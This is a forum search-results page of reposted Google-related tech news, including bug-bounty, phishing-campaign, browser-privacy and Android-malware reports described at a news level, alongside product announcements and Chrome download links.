Welcome to nsane.forums

Welcome to nsane.forums, like most online communities you need to register to view parts of our community or to make contributions, but don't worry: this is a free and simple process that requires minimal information. Be a part of nsane.forums by signing in or creating an account.

  • Access special members only forums
  • Start new topics and reply to others
  • Subscribe to topics and forums to get automatic updates

Search the Community

Showing results for tags 'google'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Found 984 results

  1. Google makes a habit of paying out respectable amounts to people who find flaws in its products, and that is exactly what happened to high schooler Ezequiel Pereira of Uruguay, who netted $10,000 from the search giant in return for finding a simple, but potentially devastating bug that could let outsiders into its internal intranet. The hack essentially consisted of changing around the host header for a specific set of URLs and just trying different domains until one was found that let the attacker in without any kind of error or security check. Using a penetration tester called Burp, Pereira managed to find and get into “yaqs.googleplex.com”, a site within Google’s internal intranet that just happened to be connected to the internet, and left relatively unsecured. Using Burp, Pereira was able to cycle through different URLs quickly, and try them from different hostname declarations. There was no real exploit used here; Pereira simply said he was accessing the site from inside Google, and the site believed him. It seemed to be a harmless page full of categorically arranged information about Google’s departments and services, perhaps left there specifically for security researchers to stumble across. When Pereira happened across a file that was labeled as confidential, he immediately filed a report to Google. The company got back to him after looking into the issue independently, and had found that the method Pereira was using could eventually have led an attacker to a place in Google’s intranet where they could potentially have found customers’ personal information. When Pereira asked why his reward payout was so high, that was the answer that Google gave him. Security researchers, both professional and amateur, have managed to find a good number of vulnerabilities and bugs in Google’s programs and services over the years. The company publishes a report every now and then showing how much it has paid out, arranged by what product or service a bug was found in and the severity of the bugs. This program is instrumental in helping Google to find and squash high-level bugs that may otherwise be exploited to obtain confidential information or help hackers obtain confidential information about Google, its partners, or even users of its services.  Article source
  2. Changelog: https://chromium.googlesource.com/chromium/src/+log/60.0.3112.78..60.0.3112.90?pretty=fuller&n=10000 Standalone - Consumer: All User Accounts: https://www.google.com/chrome/browser/desktop/index.html?system=true&standalone=1&platform=win32 https://www.google.com/chrome/browser/desktop/index.html?system=true&standalone=1&platform=win64 Your Own/Single User Account: https://www.google.com/chrome/browser/desktop/index.html?standalone=1&platform=win32 https://www.google.com/chrome/browser/desktop/index.html?standalone=1&platform=win64 Alternate: 32bit: https://redirector.gvt1.com/edgedl/release2/ANbIkxUlw6lR_60.0.3112.90/60.0.3112.90_chrome_installer.exe 64bit: https://redirector.gvt1.com/edgedl/release2/AMqTjv1SLdtU_60.0.3112.90/60.0.3112.90_chrome_installer.exe Checksum: 32bit (Size: 42.79 MB) - SHA256: 3293527F45675DAFAA85C49B6437DAC05C0FEC2E4874CEB84F40ED75A5A3BA0E 64bit (Size: 46.54 MB) - SHA256: D1C415929EF32F285A241852D2CA701CDD3563F08332BB5CA9D6278B40950121 Standalone - Enterprise: https://enterprise.google.com/chrome/chrome-browser/thankyou.html?platform=win32msi or https://dl.google.com/dl/chrome/install/googlechromestandaloneenterprise.msi https://enterprise.google.com/chrome/chrome-browser/thankyou.html?platform=win64msi or https://dl.google.com/dl/chrome/install/googlechromestandaloneenterprise64.msi Checksum: 32bit (Size: 44.62 MB) - SHA256: 310A139C1CB4A888C6BC9618BFEA08B6A7D6E8B0E7AFFAADE00C65C5180AAED0 64bit (Size: 48.42 MB) - SHA256: 2357AF0E23EFFC7188A60FC5D6F596FCC3BFB9F7B66B7F3AC5823D49F3EA576C Mac: https://enterprise.google.com/chrome/chrome-browser/thankyou.html?platform=mac Linux: https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb https://dl.google.com/linux/direct/google-chrome-stable_current_x86_64.rpm Portable: Site: http://dl2.soft98.ir Sharecode: /soft/g/Google.Chrome.60.0.3112.90.Portable.x86.exe Site: http://dl2.soft98.ir Sharecode: /soft/g/Google.Chrome.60.0.3112.90.Portable.x64.exe @thealexofevilconsumer links corrected with new one.
  3. Hyderabad: Google India has announced on Tuesday a ‘Made in India’ initiative where the company wants Indian developers to build apps that are optimised for the country, showcased on Google Play Store in a special category. “At Google Play, we are committed to helping Indian developers of all sizes seize this opportunity and build successful, locally relevant businesses,” said Purnima Kochikar, Director, Business Development, Games and Applications at Google Play. According to the Financial Express’ report, speaking at Google India’s first-ever ‘App Excellence Summit’, she said: “We support developers’ imaginations and make Android consumers aware of the new experiences our developers are creating.” The majority of internet users in the country are going online through smartphones, as per Google India. The number of Android phone users in India is now more than in the US. People in India also install more than a billion apps every month from Google Play. “These numbers might seem staggering already but the number of apps installed in India has grown by 150 percent each year,” Google India said in a statement. Indian consumer spend on apps and games is accelerating at a rapid pace, tripling in just the past year alone, it said. < Here >
  4. Google says it will train 10 million people in Africa in online skills over the next five years in an effort to make them more employable. Google also hopes to train another 100,000 software developers in Nigeria, Kenya and South Africa. Chief Executive of Google, Sundar Pichai said the company will also unveil Launchpad Accelerator with free seed equity fund of $3million. This marks an expansion of the Digital Skills for Africa launched in April last year by Google to train young Africans in digital skills. Pichai said in March this year, the firm achieved the initial target of training one million people. The company is "committing to prepare another 10 million people for jobs of the future in the next five years. The free funding would help start-ups to achieve their dreams and further help increase the GDP of the economy, which currently stood at 10 per cent," he said during his first visit to Nigeria. In her welcome address, Google Nigeria Country Manager, Juliet Ehimuan-Chiazor, said by 2034 Africa is expected to have the world’s largest working-age population of 1.1 billion, yet only between three and four million jobs are created yearly. "That means there’s an urgent need to create opportunities for the millions of people on the continent who are creative, smart and driven to succeed. The internet and technology offer great opportunities for creating jobs, growing businesses and boosting economies. But people need the right skills, tools and products to navigate the digital world and to make it work for them, their businesses and their communities," she said. < Here >
  5. Meanwhile Google starts to trial autoplay videos in search results. Today I've read about two major changes coming to Google Search. Readers don't need to be reminded that Google is the biggest online search provider by far, so changes to the way its search page operates could have big impacts one way or another. I'm always telling the wife,"if it ain't broke, don't fix it" - change for changes sake is pointless - but of course we should not either get stuck in a rut and never gladly accept change when it’s a good idea. Google Instant Search Back in 2010 Google introduced Google Instant Search. It heralded the move as a "fundamental shift in search". It worked by not just suggesting completions for what you were typing in the search box, but also by starting to load results in the area below, as you were typing. So to be clear, search suggestions will still appear in the search dialogue are but results won't start to load until you select or press enter to confirm your search term. The move is explained by Google as one that will make both desktop and mobile searches equal, with over 50 per cent of Google searches now executed via a mobile device. The above changes will make search "more fluid on all devices," said Google, reports Search Engine Land. Google tests search results containing auto-play videos Some Google Search users have reported seeing videos auto-play in the right hand column next to their search results. The BBC reports that Google has confirmed that it is trialling this intrusive behaviour and suggests it is testing it as a potential money-spinner from sponsors and advertisers. In a statement received by the Beeb, Google didn't reveal the particular thinking behind the auto-play video incursions. Instead it said "We are constantly experimenting with ways to improve the search experience for our users, but have no plans to announce at this time". Currently the Google Searches confirmed to yield these auto-play videos are confined to movies. The auto-play videos have been spotted in searches on Google's international, UK, and Canadian sites. It seems that big social network sites such as Facebook, Twitter and Instagram have already demonstrated that auto-play videos can help boost earnings... I am particularly hostile to auto-play videos when using metered internet connections, such as on my mobile, or when using mobile data on my laptop during my travels. View: Original Article
  6. TCP BBR congestion control comes to GCP – your Internet just got faster We're excited to announce that Google Cloud Platform (GCP) now features a cutting-edge new congestion control algorithm, TCP BBR, which achieves higher bandwidths and lower latencies for internet traffic. This is the same BBR that powers TCP traffic from google.com and that improved YouTube network throughput by 4 percent on average globally — and by more than 14 percent in some countries. GCP customers, like WP Engine, automatically benefit from BBR in two ways: From GCP services to cloud users: First, when GCP customers talk to GCP services like Cloud Bigtable, Cloud Spanner or Cloud Storage, the traffic from the GCP service to the application is sent using BBR. This means speedier access to your data. From Google Cloud to internet users: When a GCP customer uses Google Cloud Load Balancing or Google Cloud CDN to serve and load balance traffic for their website, the content is sent to users' browsers using BBR. This means faster webpage downloads for users of your site. At Google, our long-term goal is to make the internet faster. Over the years, we’ve made changes to make TCP faster, and developed the Chrome web browser and the QUIC protocol. BBR is the next step. Here's the paper describing the BBR algorithm at a high level, the Internet Drafts describing BBR in detail and the BBR code for Linux TCP and QUIC. What is BBR? BBR ("Bottleneck Bandwidth and Round-trip propagation time") is a new congestion control algorithm developed at Google. Congestion control algorithms — running inside every computer, phone or tablet connected to a network — that decide how fast to send data. How does a congestion control algorithm make this decision? The internet has largely used loss-based congestion control since the late 1980s, relying only on indications of lost packets as the signal to slow down. This worked well for many years, because internet switches’ and routers’ small buffers were well-matched to the low bandwidth of internet links. As a result, buffers tended to fill up and drop excess packets right at the moment when senders had really begun sending data too fast. But loss-based congestion control is problematic in today's diverse networks: In shallow buffers, packet loss happens before congestion. With today's high-speed, long-haul links that use commodity switches with shallow buffers, loss-based congestion control can result in abysmal throughput because it overreacts, halving the sending rate upon packet loss, even if the packet loss comes from transient traffic bursts (this kind of packet loss can be quite frequent even when the link is mostly idle). In deep buffers, congestion happens before packet loss. At the edge of today's internet, loss-based congestion control causes the infamous “bufferbloat” problem, by repeatedly filling the deep buffers in many last-mile links and causing seconds of needless queuing delay. We need an algorithm that responds to actual congestion, rather than packet loss. BBR tackles this with a ground-up rewrite of congestion control. We started from scratch, using a completely new paradigm: to decide how fast to send data over the network, BBR considers how fast the network is delivering data. For a given network connection, it uses recent measurements of the network's delivery rate and round-trip time to build an explicit model that includes both the maximum recent bandwidth available to that connection, and its minimum recent round-trip delay. BBR then uses this model to control both how fast it sends data and the maximum amount of data it's willing to allow in the network at any time. Benefits for Google Cloud customers Deploying BBR has resulted in higher throughput, lower latency and better quality of experience across Google services, relative to the previous congestion control algorithm, CUBIC. Take, for example, YouTube’s experience with BBR. Here, BBR yielded 4 percent higher network throughput, because it more effectively discovers and utilizes the bandwidth offered by the network. BBR also keeps network queues shorter, reducing round-trip time by 33 percent; this means faster responses and lower delays for latency-sensitive applications like web browsing, chat and gaming. Moreover, by not overreacting to packet loss, BBR provides 11 percent higher mean-time-between-rebuffers. These represent substantial improvements for all large user populations around the world, across both desktop and mobile users. These results are particularly impressive because YouTube is already highly optimized; improving the experience for users watching video has long been an obsession here at Google. Ongoing experiments provide evidence that even better results are possible with continued iteration and tuning. The benefits of BBR translate beyond Google and YouTube, because they're fundamental. A few synthetic microbenchmarks illustrate the nature (though not necessarily the typical magnitude) of the advantages: Higher throughput: BBR enables big throughput improvements on high-speed, long-haul links. Consider a typical server-class computer with a 10 Gigabit Ethernet link, sending over a path with a 100 ms round-trip time (say, Chicago to Berlin) with a packet loss rate of 1%. In such a case, BBR's throughput is 2700x higher than today's best loss-based congestion control, CUBIC (CUBIC gets about 3.3 Mbps, while BBR gets over 9,100 Mbps). Because of this loss resiliency, a single BBR connection can fully utilize a path with packet loss. This makes it a great match for HTTP/2, which uses a single connection, and means users no longer need to resort to workarounds like opening several TCP connections to reach full utilization. The end result is faster traffic on today's high-speed backbones, and significantly increased bandwidth and reduced download times for webpages, videos or other data. Lower latency: BBR enables significant reductions in latency in last-mile networks that connect users to the internet. Consider a typical last-mile link with 10 Megabits of bandwidth, a 40 ms round-trip time, and a typical 1000-packet bottleneck buffer. In a scenario like this, BBR keeps queuing delay 25x lower than CUBIC (CUBIC has a median round-trip time of 1090 ms, versus just 43 ms for BBR). BBR reduces queues and thus queuing delays on last-mile links while watching videos or downloading software, for faster web surfing and more responsive video conferencing and gaming. Because of this ability to curb bufferbloat, one might say that BBR could also stand for BufferBloat Resilience, in addition to Bottleneck Bandwidth and Round-trip propagation time. GCP is continually evolving, leveraging Google technologies like Espresso, Jupiter, Andromeda, gRPC, Maglev, Cloud Bigtable and Spanner. Open source TCP BBR is just the latest example of how Google innovations provide industry-leading performance. Article source
  7. Google has paid university professors to write academic papers that support its views on public policy issues. That’s according to a report Tuesday by the Wall Street Journal that’s based on an analysis of 329 research papers identified by the Campaign for Accountability advocacy group as linked to Google in some way. The non-profit’s study showed that these research papers, published between 2005 to 2017 and covering policy subjects like antitrust issues, “were in some way funded by the company,” the Campaign for Accountability wrote. The Journal’s report also includes emails from professors that highlight some of the ways Google (goog, +0.14%) sought to influence their writings. University of Florida law professor Daniel Sokol, for example, wrote an academic paper that said Google’s handling of user data—a controversial issue for privacy advocates—was legal. However, Sokol failed to disclose that he worked as a part-time lawyer for the law firm that represents Google. Additionally, emails uncovered by the Journal show that Sokol apparently asked Google for money to help persuade other professors to write policy papers based on unspecified patent issues in conjunction with a Google-backed online conference. Google told the Journal that it did not pay any professors, but emails between Sokol and Google show that Sokol asked Google to send him “$5,000, like last time” for his work at the conference. Sokol told the Journal that he “should have disclosed the sponsorship for such organization and have now done so.” Numerous other examples of Google influencing academics are highlighted by the Journal’s report, including one from University of Michigan law professor Daniel Crane who declined to take money from Google to support his paper that argued against “antitrust regulation of internet search engines.” “Yeah, the money is good but it does get in the way of objective academic research,” Crane said. Google issued a harsh response Tuesday to the Campaign for Accountability’s analysis of academic papers with financial ties to the search giant. Google said the non-profit’s report is “highly misleading” and that when Google provides money to academics, “we expect and require grantees to properly disclose our funding.” The search giant also chastised the non-profit for failing to disclose it’s own corporate backers, which, as Fortune’s Jeff Roberts reported last summer, includes Oracle (orcl, +0.52%). Google said that Oracle is “running a well-documented lobbying campaign against us,” and that the non-profit’s other corporate “backers won’t ‘fess up either” about their financial ties to the group. An Oracle spokesperson told Fortune that the company has "absolutely nothing to do with this report." “We’re proud of our programs and their integrity,” Google said in a statement. “The ‘Campaign for Accountability’ and its funders are, clearly, not proud of theirs.” It should be noted that Google's statement did not mention the Journal's report highlighting emails between Google employees and various professors. < Here >
  8. Google to launch a new Google Earth tool The "new Google Earth" will be unveiled next week, Google says, refraining to share any more details regarding the upcoming event. Appropriately, according to the invites Google is sending out, the event will take place on April 18, four days before Earth Day, which is held internationally on April 22nd. Google Earth used to be one of the coolest things to play around with online, providing users with a way to move around the earth and explore new locations; but not before checking out the street their house is one. In the past few years, however, Earth has been largely swallowed up by Maps, which became an impressively powerful tool to have. It's unclear at this point what Google has planned for the day, but it wouldn't hold a dedicated event for Google Earth just to remind you that it exists. The most likely scenario involves a completely redesigned tool, perhaps speedier engines, so the images load faster or maybe even more updated imagery via the company's myriad of satellites. Cool features, maybe more VR Google Earth has always been a cool tool to have, allowing you to do a lot of things that Maps never could, like use a flight simulator, view the effects of global warming over time, go back in time and view historical pictures, or dive beneath the ocean waves. Another thing that Google may be announcing in its Earth event next week is the integration of more VR elements. Given the company's announcement a few months back regarding Google Earth VR, which allows people to put on a VR headset and fly to various destinations around the world like some kind of Superman, we might see more of this too. At the time, however, Google Earth VR only featured a few preset destinations, like the Amazon River, Manhattan or the Swiss Alps. Sadly, this is all just speculation at this point, no matter how good it sounds. Thankfully, however, the event is just days away, so we don't have to wait too long. Source
  9. I had my VPN set on Canada and then when I went to Google the address was www.google.com.br instead of www.google.com. Why does it do that?
  10. In the past few months, Google has suffered a series of setbacks due to litigation. Most recently, the company was hit with a whopping €2.42 billion fine after the European Commission ruled that Google was violating EU anti-trust regulations by inflating their own shopping service results in Google search pages. Back in mid-April, Google suffered another blow when the Russian Federal Antimonopoly Service (FAS) ruled that the company was violating its market dominance by essentially forcing OEMs to pre-install Google services on their devices. Part of the company’s settlement with the FAS involved creating a new Google Chrome search widget that can replace the default Google search widget. Chrome Search Widget with Yahoo as the Provider Chrome Search Widget with Bing as the Provider Chrome Search Widget Selection Chrome Search Engines In doing so, users can then change their default search provider in Chrome’s settings so that this new widget can quickly access any third-party search engine provider. Users first started to notice this new search widget in early May as it rolled out to the Chrome Dev and Canary channels, but per the settlement with FAS this widget only fulfills part of the agreement with the Russian government. According to the FAS: For the devices that are currently circulating on the Russian market, Google will develop an active “choice window” for the Chrome browser which at the time of the next update will provide the user with the opportunity to choose their default search engine. Within a few months, Google will develop for new devices a new Chrome widget that will replace the standard Google search widget on the home screen. This will allow end users of the devices based on the Android OS with the GMS package to see the new “choice screen” at the first launch of the new Chrome widget. This choice screen enables users to choose Yandex search or Google search or any other search engine of those developers who will sign a commercial agreement on their inclusion to the choice screen. Changing the device’s locale to Russian, wiping Chrome Canary’s data, and adding the search widget has not yet yielded the promised search engine “choice screen” that Russia requires from Google. But according to a recent commit to the Chromium open source project, that may soon change. The commit enables the “search engine promo” by default – a flag which will show a promotion dialog about enabling other search engines depending on your locale. Chrome’s LocaleManager details what Chrome will do when the device is determined to be in a “special locale” (though interestingly enough, I haven’t been able to find exactly which locales are deemed to be “special”). There are 4 different states that Chrome determines the user to be in – “don’t show”, “new”, “existing”, and “sogou.” “Don’t show” clearly means that the user should not be shown a search engine promotion dialog as they are not located within a special locale. The “new” state means that user is setting up Chrome for the first time, so the browser will show the DefaultSearchEngineFirstRunFragment that provides a layout of available search engines to choose from on first launch. “Existing” refers to users already using Chrome, which will call the DefaultSearchEnginePromoDialog method to force users to choose a default search engine from a provided list. The dialog is not cancellable and cannot be bypassed. Finally, and what I believe to be the most interesting, is the “sogou” state. Presumably if installed in China, Google Chrome will set the default search engine provider to be Sogou – China’s second largest search provider. The SpecialLocaleHandler determines whether or not to set Google search as the default search provider based on Locale. The DefaultSearchEngineDialogHelper method handles listing which search providers will be listed once called. Interestingly, there’s a routine within this method that quite literally shuffles the search engine list in random order, presumably so that which provider is listed at the top of the list is totally random. Although this search engine promotion dialog will currently only be shown in China and Russia, we wouldn’t be surprised if users in the European Union will start to see this in the future. Especially since the EU and Google are embroiled in ongoing litigation about Google applications being pre-installed on Android devices – a practice which the Russian FAS already ruled to be anti-competitive. If Google were to lose the Android case in the EU, then this search engine promotion dialog may become the rule rather than the exception. Article source
  11. Whenever you open a New tab page in Chrome if you’ve been redirected to https://chrome-updates.win/s.html page, without further thinking uninstall or remove the VPN extensions you’ve using. These extensions have been compromised and used by the phishing site to spread malware. Millions of users are using VPN extensions in Chrome browsers, these are directing users to fake Chrome update page, and also showing ads on sites you visit. Do note, Chrome will never ask you to download update as it will be automatically updated or you will be notified via an icon in the Chrome menu when an update is available. You should be always be downloading and installing updates manually by visiting ‘About Google Chrome’ page in Help menu. You should be removing these extensions right now, if using Touch VPN Hotspot shield Betternet unlimited Free VPN Proxy Here is how you can remove them Click on Chrome Menu > More tools > Extensions, Select the extension and select ‘Report abuse‘ before clicking ‘Remove’ button. After that, do the following Download and run Chrome Cleanup tool, and remove any malicious programs if found and reset Chrome Download Malwarebytes and perform a scan. Also Run Adwcleaner. Article source
  12. According to a new blog post on Google's blog, Google will soon stop scanning emails on its Gmail email service for advertisement purposes. Gmail scans user emails on Gmail for a variety of purposes. These include to make sure that they don't contain spam or malware, but also to use the information for advertising purposes. Privacy advocates have criticized Google for the practice, and Microsoft never failed to mention the fact and even used it in the company's infamous Scroogled advertisement campaign. Google uses the information that it gains from the scans, and information that it has about the user from other sources, to display targeted advertisement to the user. Google states that in Gmail's Terms of Service: Our automated systems analyze your content (including emails) to provide you personally relevant product features, such as customized search results, tailored advertising, and spam and malware detection. This analysis occurs as the content is sent, received, and when it is stored. Google's Diane Greene, SVP Google Cloud, announced the change in a new blog post on the official Google blog on June 23, 2017. G Suite’s Gmail is already not used as input for ads personalization, and Google has decided to follow suit later this year in our free consumer Gmail service. Consumer Gmail content will not be used or scanned for any ads personalization after this change. This decision brings Gmail ads in line with how we personalize ads for other Google products The decision was not made by Google's ad division, but by the company's Cloud division. The rationale behind the decision is that Google's Cloud division believes that organizations may not use Google's services because of the privacy implications that go along with scanning emails for advertisement purposes. Google's G Suite never displayed email scanning advertisement to users of the service, but Google believes that company decision makers may still have been confused by it. The outcome is positive for users of the free Gmail service: Google plans to stop scanning Gmail emails for advertisement purposes. This does not mean that the free Gmail won't show advertisement. The ad selection process however will use other available sources of information to display ads to users on Gmail, for instance from searches or from YouTube activity. Google is playing catch-up to Amazon and Microsoft when it comes to Enterprise cloud services. Revenue of the company's cloud division is on the rise; G Suite has more than 3 million users as of June 2017, and usage has doubled in the past year among large business customers according to the announcement. Source: Google won’t read Gmail emails anymore for advertisement(Ghacks)
  13. Quick Tip Today am gonna show you how you can download your favorite Android Apps directly from Google Play Store. From the Play Store, search for your favorite app, copy the link with the app id visit apps.evozi.com/apk-downloader/ Paste the link and click generate download link. Wait for some seconds as your download link is been generated. After some few seconds, your link should be ready for download. eNJOy!!! source: thetechblog
  14. Security researchers have exposed a sophisticated hacking and disinformation campaign that targeted more than 200 Gmail users. Russian government hackers seem to have figured out that sometimes the best way to hack into people's Gmail accounts is be to abuse Google's own services. On Thursday, researchers exposed a massive Russian espionage and disinformation campaign using emails designed to trick users into giving up their passwords, a technique that's known as phishing. The hackers targeted more than 200 victims, including, among others, journalists and activists critical of the Russian government, as well as people affiliated with the Ukrainian military, and high-ranking officials in energy companies around the world, according to a new report. Researchers at the Citizen Lab, a digital rights research group at the University of Toronto's Munk School of Global Affairs, were able to identify all these victims following clues left in two phishing emails sent to David Satter, an American journalist and academic who's written Soviet and modern Russia, and who has been banned from the country in 2014. On October 7, Satter received a phishing email designed to look like it was coming from Google, claiming someone had stolen his password and that he should change it right away. As with seen with other phishing attacks targeting people affiliated with the Hillary Clinton campaign that led to the DNC leaks of last year, the email, however, didn't come from Google. It was actually from a group of hackers known as Fancy Bear, or APT28, whom many believe work for Russia's military intelligence, the GRU. A screenshot of the phishing email received The "Change Password" button linked to a short URL from the Tiny.cc link shortener service, a Bitly competitor. But the hackers cleverly disguised it as a legitimate link by using Google's Accelerated Mobile Pages, or AMP. This is a service hosted by the internet giant that was originally designed to speed up web pages on mobile, especially for publishers. In practice, it works by creating a copy of a website's page on Google's servers, but it also acts as an open redirect. According to Citizen Lab researchers, the hackers used Google AMP to trick the targets into thinking the email really came from Google. "It's a percentage game, you may not get every person you phish but you'll get a percentage," John Scott-Railton, a senior researcher at Citizen Lab, told Motherboard. So if the victim had quickly hovered over the button to inspect the link, they would have seen a URL that starts with google.com/amp, which seems safe, and it's followed by a Tiny.cc URL, which the user might not have noticed. (For example: https://www.google[.]com/amp/tiny.cc/63q6iy) Using Google's own redirect service was also perhaps also a way to get the phishing email past Gmail's automated filters against spam and malicious messages. "It's a percentage game, you may not get every person you phish but you'll get a percentage." According to Citizen Lab, who doesn't directly point the finger at Fancy Bear, the email was actually sent by annaablony[@]mail.com. That address was used in 2015 by Fancy Bear to register a domain, according to security firm ThreatConnect. And another domain used in the October attacks exposed by Citizen Lab was also previously linked to Fancy Bear, according to SecureWorks, which tracked the phishing campaign against the DNC and the Clinton campaign. Curiously, the email targeting Satter came just a few days before Google warned some Russian journalists and activists that "government-backed attackers" were trying to hack them using malicious Tiny.cc links. A screenshot of a phishing email received Now we know that in October of 2016, when the hackers targeted Satter and at least 200 other people, the trick of using Google AMP was working, and Google hadn't blocked it. Google has previously dismissed concerns about open redirectors, arguing that "a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk." On Thursday, a company spokesperson said that this is a known issue and last year some Google AMP URLs started showing a warning if the company's systems are uncertain whether the link is safe to visit, such as this. But for some security researchers, they are dangerous. "The AMP service's behavior as an open redirect for desktop browsers was clearly abused in this situation and is also just trivial to abuse in general," Nicholas Weaver, a senior researcher at the International Computer Science Institute at UC Berkeley, told Motherboard in an email. "There is undoubtedly some engineering tradeoff I'm not seeing that causes them to maintain it." Google's redirectors might not be the only part of Google's infrastructure that Fancy Bear hackers have been taking advantage of. Citizen Lab researchers found a Tiny.cc URL that targeted an email address—myprimaryreger[@]gmail.com—that other security researchers suspect was used by Fancy Bear to test their own attacks. A screenshot of the Google Plus page of "myprimaryreger[@]gmail.com," an account researchers believe was controlled That address had a Google Plus page filled with images that appear in real, legitimate Gmail security alerts. It's unclear what the hackers used these for, or if they used them at all. But the researchers said that perhaps the hackers were embedding them in phishing emails, and the fact that they were hosted on Google Plus perhaps helped thwart Gmail's security controls. The Fancy Bear hackers are known to use popular services like URL shorteners in their high-profile hacking operations. And, sometimes, those URL shorteners betray them and end up revealing who they targeted. Between March 2015 and May 2016, as part of their operation to hack Clinton's campaign chairman John Podesta, and former National Security Advisor Colin Powell, the hackers targeted more than 6,000 people with more than 19,000 phishing links. Some of those used Bitly URLs that, as it turned out, could be decoded to figure out who they were intended to. An analysis of the Bitly link used to phish John Podesta Similarly, in this case Citizen Lab researchers were able to identify the victims by figuring out that there was a pattern behind how Tiny.cc creates short URLs. That pattern, as research fellow Adam Hulcoop explained to me, "was chronological." So, starting from the links sent to Satter, the researchers were able to guess other links created around the same time. It's impossible to know why the hackers keep relying on services like Bitly or Tiny.cc, which end up exposing some of their operations—although months later. One explanation could be that their phishing campaigns are highly automated, given that they target thousands of people. So, as Hulcoop put it, they need a modular phishing infrastructure where every element can be modified if needed, as "an insurance policy of sorts" and they use third party services "to try and balance the need for OpSec [operational security, or the practice of keeping operations secret] with the ability to operate at scale." "The construction of the Tiny.cc shortcodes pointing to TinyURL shortcodes, which ultimately point to phishing sites on different servers. This modularity is likely by design so that the operator can change up the individual components, servers, redirectors, etc., and only abandon the pieces that are burned," he said in an online chat. "The more layers you have, the more flexible you can be." Article source
  15. Google has a new feature Google is rolling out a cool new feature that allows you to perform searches through your personal data - from Gmail or Photos - straight from the search engine interface. First spotted by Search Engine Roundtable, this new "Personal" tab shows you content from private sources, including emails and photos you've taken and uploaded to the cloud. There's nothing particularly difficult to figure out about this new tab because it works just like any other tab on Google. You first have to type whatever it is you want to look for like "flowers," and switch to the "Personal" tab, which you can find in the "More" tab at the end of the line. There, you'll find any emails you have received featuring this word, as well as any pictures stored in your Photos account containing flowers. As mentioned, this is a tab that you'll have to look for specifically if you want to look through it, as it's not included among the main ones. Incoming to you The feature seems to be rolling out slowly to users all over the world and looks like a great and interesting addition. After all, who doesn't like to be able to search through their personal data so easily and from a single interface? The feature works on both the web and the mobile versions of Google, so you can enjoy it wherever you are and whenever it happens for you to need to find something in your personal data without opening up loads of extra apps or, depending on what device you're using, tabs. To alleviate any worries people may have, the company added a notice on this new feature which states that "only you can see these results." This, of course, should make anyone concerned with seeing their private photos in a Google box relax some. Source
  16. Chrome: Sites May Record Audio/Video Without Indication Websites may abuse WebRTC in Google Chrome to record audio or video using the technology without any indication of that to the user. A security vulnerability was reported to Google on April 10, 2017 which allows an attacker to record audio or video using Chrome without indication. Most modern web browsers support WebRTC (Web Real-Time Communications). One of the benefits of WebRTC is that it supports real-time communication without the use of plugins. This includes options to create audio and video chat services, p2p data sharing, screen sharing, and more using the technology. There is also a downside to WebRTC, as it may leak local IP addresses in browsers that support WebRTC. You can protect the IP address from being revealed in Firefox, Chrome and Vivaldi, for instance. The reported vulnerability affects Chrome but it may affect other web browsers as well. For it to work, you'd have to visit a site and allow it to use WebRTC. The site that wants to record audio or video would spawn a JavaScript window then without header, a pop under or pop up window for instance. It can then record audio or video, without giving indications in Chrome that this is happening. Chrome displays recording indicators usually in the tab that uses the functionality, but since the JavaScript window is headerless, nothing is shown to the user. A proof of concept was created which you find linked on the Chromium Bugs website. All you need to do is click on two buttons, and allow the site to use WebRTC in the web browser. The proof of concept demo records audio for 20 seconds, and gives you an option afterwards to download the recording to the local system. A Chromium team member confirmed the existence of the issue, but did not want to call it vulnerability. The explanation does not make a whole lot of sense to me. Because Android does not show an indicator in first place, and Chrome on the desktop only if enough interface space is available, it is not a security vulnerability? At the very least, it is a privacy issue and something that users need to be aware of. While users do have to trust sites enough to give them permissions to use WebRTC, it and the fact that the site needs to launch a popup window are the only things needed to exploit this. Google may improve the situation in the future, but users are on their own right now when it comes to that. The best form of protection is to disable WebRTC which can be done easily if you don't require it, the second best to allow only trusted sites to use WebRTC. If you allow a site to use WebRTC, you may want to look out for any other windows that it may spawn afterwards on top of that. Now You: Do you use services or apps that use WebRTC? Source
  17. Google has removed 41 Android apps from the official Play Store. The apps were infected with a new type of malware named Judy, and experts estimate the malware infected between 8.5 and 36.5 million users. According to researchers from Check Point, the apps were available on the Play Store for years, but have been clean and virus-free for most of the time. It appears that starting with April 2016, the apps were slowly updated with malicious code. The purpose of this code was to launch a browser app, load an URL, and use JavaScript to locate and click on specific banners that would bring profits to the malware's creators. One company behind most malicious apps According to Check Point, almost all malicious apps were made by a South Korean company called Kiniwini, but registered on the Google Play Store as ENISTUDIO corp. It is unclear if the company added the malicious code itself, or its servers were compromised and the code added by a third-party. Furthermore, besides the hidden ad-clicking activity, the operators of the Judy malware used it to insert intrusive ads in other apps, almost to the point that users had no possibility of viewing or interacting with the original app's content. A list of apps infected with the Judy Android malware is available here. Despite apps going through periodic reviews, Google's Play Store security system, named Bouncer, wasn't able to pick up the malware's malicious activity. Nonetheless, help is coming! Google launches new Android security services On May 17, during the Google I/O annual event, Google announced a new service called Google Play Protect. According to Google, this new service continuously scans all Android apps and user devices for malicious behavior and uses machine learning to detect any suspicious activity. Once it detects a malicious app, it removes it from the phones of all users who installed it. The new Google Play Protect service suite is currently shipping to all devices with the Google Play app installed. Source
